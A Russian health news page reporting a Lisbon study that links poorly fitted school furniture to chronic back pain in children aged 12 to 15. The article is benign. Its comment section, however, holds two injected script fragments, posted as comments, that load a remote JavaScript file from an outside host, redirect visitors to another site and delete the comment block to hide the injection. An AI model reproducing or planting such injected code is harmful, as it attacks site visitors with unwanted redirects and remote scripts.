Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ученые подтвердили то, о ...  >>  Ученые подтвердили то, о чем мы догадывались! Самые болезненные дни в жизни – школьные
 
Обратная связь
 

Ученые подтвердили то, о чем мы догадывались! Самые болезненные дни в жизни – школьные

Размер шрифта
11 декабря 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Маленькие стулья, низкие парты и тяжеленые рюкзаки – эти и другие сомнительные прелести школьной жизни навеки врезаются в память. Португальские ученые убеждены, что от подобных неудобств до болезни – один шаг.

Ученые подтвердили то, о чем мы догадывались! Самые болезненные дни в жизни – школьные

Группа ученых из Лиссабонского университета во главе с Анной Ассункау подвергла анализу группу из 138 школьников в возрасте от двенадцати до пятнадцати лет. Цель работы была сформулирована следующим образом: изучить влияние плохой эргономики школьной мебели и тяжести школьных рюкзаков (в сочетании с индивидуальными антропометрическими особенностями) на здоровье детей и подростков.

Выяснилось, что до 80% школьников страдают от хронических болей в спине, при этом важнейшим фактором, предрасполагающим к развитию оных, является несоответствие между анатомическими особенностями и размерами мебели.

Девочки чуть чаще сталкиваются с подобными проблемами (59% против 47%).

«Интересно, что мы не выявили статистическую связь между тяжестью рюкзаков, индексом массы тела и болью в спине», – утверждают авторы.

Ученые подчеркивают, что количество детей школьного возраста, предъявляющих жалобы на эпизодические боли в спине, значительно выросло за последние несколько десятилетий. Современная концепция такова: если человек страдает от боли в спине, будучи ребенком, то без должного лечения эта проблема будет мучить его и во взрослой жизни.

Исследователи признают, что в развитие болевого синдрома свой вклад вносит и ряд других факторов, как: возраст, семейный анамнез, предшествующие травмы, образ жизни, уровень стресса и другие. Тем не менее, роль неправильно спроектированной мебели можно охарактеризовать как одну из важнейших, учитывая, сколько времени дети проводят за неудобными столами и на сколь низком уровне находится физическое воспитание в большинстве учебных учреждений. Напоминаем: Всемирная Организация Здравоохранения рекомендует заниматься спортом не менее 60 минут в день!

«Результаты нашей работы свидетельствуют о том, что нужно уделять более пристальное внимание эргономике школьной мебели и помещений; это имеет важное профилактическое значение, наряду с правильным питанием и физической активностью».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:50

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:50

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Ваше появление на свет – чудо   Батуты убивают людей! Что делать?   Как успеть все по науке?   Иммуномодуляры: мифы и правда  
03 октября 2013Результаты благотворительного марафона «Всем миром» 17 июля 2013Будет ли ваш ребенок толстым – теперь это можно понять уже в 2 месяца!
 
10 июля 2013От того, что ест беременная женщина, зависит ум ее ребенка 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 

Слайдшоу

1
Детские болезни, которые должна знать каждая мама. Часть 2
Самые бесполезные упражнения и чем их заменить
Можно ли пережить беременность без рвоты?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Что вы знаете о грудном вскармливании?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.